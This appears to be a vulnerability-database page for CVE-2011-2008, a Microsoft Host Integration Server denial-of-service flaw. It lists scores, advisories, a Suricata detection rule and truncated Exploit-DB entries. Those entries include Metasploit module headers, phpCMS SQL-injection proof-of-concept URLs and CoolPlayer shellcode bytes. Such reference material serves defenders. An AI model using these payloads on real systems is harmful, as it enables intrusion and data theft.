CVE-2011-2008
published 2011-10-12CVE-2011-2008: Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via…
PriorityP430medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
21.34%
97.3th percentile
Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability."
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | host_integration_server | — | — |
| microsoft | host_integration_server | — | — |
| microsoft | host_integration_server | — | — |
| microsoft | host_integration_server | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat6.9MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v93c-j87p-pp29: Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service ou
ghsa_unreviewed·2022-05-14
CVE-2011-2008 [MEDIUM] CWE-20 GHSA-v93c-j87p-pp29: Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service ou
Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability."
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
VMware
VMware vCenter Server and vSphere Client security vulnerabilities
vendor_vmware·2011-05-05·CVSS 4.3
CVE-2011-0426 [MEDIUM] VMware vCenter Server and vSphere Client security vulnerabilities
VMSA-2011-0008: VMware vCenter Server and vSphere Client security vulnerabilities
a. vCenter Server Directory Traversal vulnerability A directory traversal vulnerability allows an attacker to remotely retrieve files from vCenter Server without authentication. In order to exploit this vulnerability, the attacker will need to have access to the network on which the vCenter Server host resides. In case vCenter Server is installed on Windows 2008 or Windows 2008 R2, the security vulnerability is not present. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-0426 to this issue. VMware Product ============= Product Version ======= Running on ======= Replace with/ Apply Patch ================= VMware Product ============= vCenter Product Version ====
Red Hat
bash: Insecure temporary file use in aliasconv.sh, aliasconv.bash, cshtobash (symlink attack)
vendor_redhat·2008-08-13·CVSS 6.9
CVE-2008-5374 [MEDIUM] bash: Insecure temporary file use in aliasconv.sh, aliasconv.bash, cshtobash (symlink attack)
bash: Insecure temporary file use in aliasconv.sh, aliasconv.bash, cshtobash (symlink attack)
bash-doc 3.2 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/cb#####.? temporary file, related to the (1) aliasconv.sh, (2) aliasconv.bash, and (3) cshtobash scripts.
Statement: This issue has been addressed in Red Hat Enterprise Linux 4 via RHSA-2011:0261 advisory. This issue has been addressed in Red Hat Enterprise Linux 5 via RHSA-2011:1073 advisory.
Suricata
ET WEB_CLIENT Adobe Acrobat Util.printf Buffer Overflow Attempt
suricata·2011-07-01
CVE-2008-2992 ET WEB_CLIENT Adobe Acrobat Util.printf Buffer Overflow Attempt
ET WEB_CLIENT Adobe Acrobat Util.printf Buffer Overflow Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Adobe Acrobat Util.printf Buffer Overflow Attempt"; flow:established,to_client; file.data; content:"util.printf|28 22 25|"; nocase; fast_pattern; pcre:"/util.printf\x28\x22\x25[^\x2C\x29]*f\x22\x2C/i"; reference:url,www.coresecurity.com/content/adobe-reader-buffer-overflow; reference:bid,30035; reference:cve,2008-2992; classtype:attempted-user; sid:2013152; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_07_01, cve CVE_2008_2992, deployment Perimeter, confidence High, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_04_09;)
Exploit-DB
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
exploitdb·2016-10-18
CVE-2011-1249 Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
---
/*
################################################################
# Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046)
# Date: 2016-10-16
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Vista SP1 x64
# Windows Vista SP2 x64
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows Server 2008 x64
# Windows Server 2008 SP2 x64
# Windows Server 2008 Itanium-based Systems
# Windows Server 2008 SP2 Itanium-based Systems
# Windows 7 x86
# Windows 7 SP1 x86
# Wi
Exploit-DB
Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities
exploitdb·2011-11-28
CVE-2011-4879 Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities
Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities
---
#######################################################################
Luigi Auriemma
Application: Siemens SIMATIC WinCC flexible (Runtime)
http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx
Versions: 2008 SP2 + security patch 1
Platforms: Windows
Bugs: A] HmiLoad strings stack overflow
B] HmiLoad directory traversal
C] HmiLoad various Denials of Service
D] miniweb directory traversal
E] miniweb arbitrary memory read access
Exploitation: remote
Date: 28 Nov 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2
Exploit-DB
phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)
exploitdb·2011-10-26
CVE-2008-6132 phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)
phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)
---
##
# $Id: phpscheduleit_start_date.rb 14073 2011-10-26 18:06:12Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection',
'Description' => %q{
This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt
software. This vulnerability is only exploitable when the magic_quotes_gpc PHP
option is 'off'. Authentication is not required to exploit the bug.
Version 1.2.10 and
Exploit-DB
TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)
exploitdb·2011-10-11
CVE-2008-4779 TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)
TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)
---
##
# $Id: tugzip.rb 13868 2011-10-11 03:30:14Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/zip'
class Metasploit3 'TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the latest version 3.5 of TugZip archiving utility.
In order to trigger the vulnerability, an attacker must convince someone
to load a specially crafted zip file with TugZip by double click or file op
Exploit-DB
Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption
exploitdb·2011-10-04·CVSS 6.8
CVE-2011-2841 [MEDIUM] Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption
Google Chrome = 14.0.835.163
Discovered by: Mario Gomes
----------------Summary----------------
Google Chrome is a web browser developed by Google that uses the WebKit layout engine.
It was first released as a beta version for Microsoft Windows on September 2, 2008, and the public stable release was on December 11, 2008.
The name is derived from the graphical user interface frame, or "chrome", of web browsers.
As of August 2011, Chrome is the third most widely used browser with 23.16% worldwide usage share of web browsers, according to StatCounter.(From Wikipedia)
----------------Description----------------
Google Chrome suffers from a memory corruption vulnerability that occurs in the manipulation of PDF files.
The failure occurs when the browser opens an HTML file that contains mul
Exploit-DB
Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
exploitdb·2011-06-20
CVE-2008-2683 Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
---
Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit
arg1="http://www.google.com/robots.txt"
arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt"
target.DownloadImageFileURL arg1 ,arg2
# MSF Module
##
# $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
:vuln_test => n
Exploit-DB
AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)
exploitdb·2011-05-25
CVE-2008-3922 AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)
AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)
---
##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'AWStats Totals = %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12715 $',
'References' =>
[
['CVE', '2008-3922'],
['OSVDB', '47807'],
['BID', '30856'],
['URL
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
exploitdb·2011-02-02
CVE-2008-4654 VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
---
##
# $Id: videolan_tivo.rb 11701 2011-02-02 21:47:02Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VideoLAN VLC TiVo Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
By creating a malicious TY file, a remote attacker could overflow a
buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'Version' => '$Revision: 11701 $',
'References' =>
[
[ 'CVE', '2008-4654' ],
[ 'OSVDB', '49181'
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb·2011-01-24
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)
exploitdb·2011-01-21
CVE-2008-4250 Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)
---
##
# $Id: ms08_067_netapi.rb 11614 2011-01-21 04:09:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Server Service Relative Path Stack Corruption',
'Description' => %q{
This module exploits a parsing flaw in the path canonicalization code of
NetAPI32.dll through the Server Service. This module is capable of bypassing
NX on some operating systems and service packs. The correct target must be
used to prevent the Server Service
Exploit-DB
phpCMS 2008 - SQL Injection
exploitdb·2011-01-20
CVE-2011-0645 phpCMS 2008 - SQL Injection
phpCMS 2008 - SQL Injection
---
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn
[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^]� Xp10_hAcKEr
[?]
# REMOTE SQL iNJECTioN Vulnerabilities
[*] Err0r C0N50L3:
http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON
[*] prove of concept =
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)
Already Tested on Win Xp
[~]-----------------------
Exploit-DB
phpCMS 2008 V2 - 'data.php' SQL Injection
exploitdb·2011-01-17
CVE-2011-0645 phpCMS 2008 V2 - 'data.php' SQL Injection
phpCMS 2008 V2 - 'data.php' SQL Injection
---
source: https://www.securityfocus.com/bid/45913/info
PHPCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHPCMS 2008 V2 is vulnerable; other versions may also be affected.
http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()--
Exploit-DB
Signed Applet Social Engineering - Code Execution (Metasploit)
exploitdb·2011-01-08·CVSS 10.0
CVE-2008-5353 [CRITICAL] Signed Applet Social Engineering - Code Execution (Metasploit)
Signed Applet Social Engineering - Code Execution (Metasploit)
---
##
# $Id: java_signed_applet.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 'Signed Applet Social Engineering Code Exec',
'Description' => %q{
This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it
to a .jar file, then signs the .jar with a dynamically created certificate containing
values of your choosing. This is presented to the end user via a web page with an applet
tag, loading the sig
Exploit-DB
Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
exploitdb·2011-01-08
CVE-2008-6825 Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
---
##
# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# -*- coding: utf-8 -*-
require 'msf/core'
class Metasploit3 'Trixbox langChoice PHP Local File Inclusion',
'Description' => %q{
This module injects php into the trixbox session file and then, in a second call, evaluates
that code by manipulating the langChoice parameter as described in OSVDB-50421.
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
'Version' => '$Revision: 11516 $',
Exploit-DB
CoolPlayer 2.18 - DEP Bypass
exploitdb·2011-01-02
CVE-2008-3408 CoolPlayer 2.18 - DEP Bypass
CoolPlayer 2.18 - DEP Bypass
---
# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines
print "\n============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================\n"
# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(
"\xda\xda\xd9\x74\x24\xf4\xbf\xe7\x18\x22\xfb\x2b\xc9\xb1\x33"
"\x5e\x31\x7e\x17\x83\xee\xfc\x03\x99\x0b\xc0\x0e\x99\xc4\x8d"
"\xf1\x61\x15\xee\x78\x84\x24\x3c\x1e\xcd\x15\xf0\x54\x83\x95"
"\x7b\x38\x37\x2d\x09\x95\x38\x86\xa4\
Bugzilla
CVE-2011-4324 kernel: nfsv4: mknod(2) DoS
bugzilla·2011-11-21·CVSS 4.9
CVE-2011-4324 [MEDIUM] CVE-2011-4324 kernel: nfsv4: mknod(2) DoS
CVE-2011-4324 kernel: nfsv4: mknod(2) DoS
Creating a file with mknod(2) syscall on a nfsv4 mount can trigger BUG().
Discussion:
Eryu Guan 2011-11-18 02:16:30 EST
Upstream commit
commit dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
Author: Trond Myklebust
Date: Tue Dec 23 15:21:56 2008 -0500
NFSv4: Convert the open and close ops to use fmode
Signed-off-by: Trond Myklebust
removed the BUGON() at fs/nfs/nfs4xdr.c:894
---
Statement:
This issue did not affect the Linux kernels as shipped with Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG as they did not have the vulnerable code as introduced in history:1a7bc914. This has been addressed in Red Hat Enterprise Linux 5 via https://rhn.redhat.com/errata/RHSA-2012-0007.html. Red Hat Enterprise Linux 4 is now in Production 3 of the maint
Bugzilla
CVE-2008-7293 firefox: unable to restrict modifications to cookies in HTTPS sessions due to loack of HSTS support
bugzilla·2011-08-12·CVSS 5.8
CVE-2008-7293 [MEDIUM] CVE-2008-7293 firefox: unable to restrict modifications to cookies in HTTPS sessions due to loack of HSTS support
CVE-2008-7293 firefox: unable to restrict modifications to cookies in HTTPS sessions due to loack of HSTS support
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-7293 to
the following vulnerability:
Name: CVE-2008-7293
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7293
Assigned: 20110809
Reference: http://code.google.com/p/browsersec/wiki/Part2 #Same-origin_policy_for_cookies
Reference: http://michael-coates.blogspot.com/2010/01/cookie-forcing-trust-your-cookies-no.html
Reference: http://scarybeastsecurity.blogspot.com/2008/11/cookie-forcing.html
Reference: http://scarybeastsecurity.blogspot.com/2011/02/some-less-obvious-benefits-of-hsts.html
Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=660053
Reference: http://hacks.mozilla.org/2010/08/firef
Bugzilla
CVE-2008-5299 chm2pdf insecure temporary file symlink flaw
bugzilla·2008-12-03·CVSS 6.9
CVE-2008-5299 [MEDIUM] CVE-2008-5299 chm2pdf insecure temporary file symlink flaw
CVE-2008-5299 chm2pdf insecure temporary file symlink flaw
chm2pdf 0.9 allows user-assisted local users to delete arbitrary files via a symlink attack on .chm files in the (1) /tmp/chm2pdf/work or (2) /tmp/chm2pdf/orig temporary directories.
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=501959
Discussion:
Let's try this again. chm2pdf in Fedora 14 is still vulnerable to this. A
patch was provided in the Debian bug:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=501959#20
I can't think of a reason not to use it.
---
Created chm2pdf tracking bugs for this issue
Affects: fedora-all [bug 665494]
---
This flaw was corrected in Fedora 14:
chm2pdf-0.9.1-9.fc14 (FEDORA-2011-0454)
and Fedora 13:
chm2pdf-0.9.1-8.fc13 (FEDORA-2011-0467)
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-082https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12915https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-082https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12915
2011-10-12
Published